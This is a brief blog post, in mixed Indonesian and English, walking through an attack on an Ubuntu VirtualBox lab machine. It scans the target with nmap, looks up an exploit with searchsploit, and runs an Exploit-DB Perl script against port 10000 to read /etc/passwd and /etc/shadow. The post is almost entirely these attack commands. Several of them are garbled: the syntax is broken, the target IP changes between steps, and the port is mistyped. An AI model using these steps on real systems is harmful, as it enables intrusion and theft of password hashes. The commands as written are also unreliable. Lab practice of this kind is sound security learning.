Privilege Escalation os UBUNTU in Virtualbox
First we did a scan ip with Zenmap, or by using the following command nmap-v-A Ip target <192.168.56.101>


then we will try to use exploitdb application, use the command . / linux ssh remote searchsploit
terus kita gunakan perintah selanjutnya perl platforms/multiple/remote/2017.pl 192.168.56.101 10000 /etc/passwd 0 untuk mengetahui kode masuk atau login
and the next type <perl platforms/multiple/remote/2017.pl 192.168.43.101 10 000 /etc/shadow 0> to know the login password.




0 Komentar:
Posting Komentar
Berlangganan Posting Komentar [Atom]
<< Beranda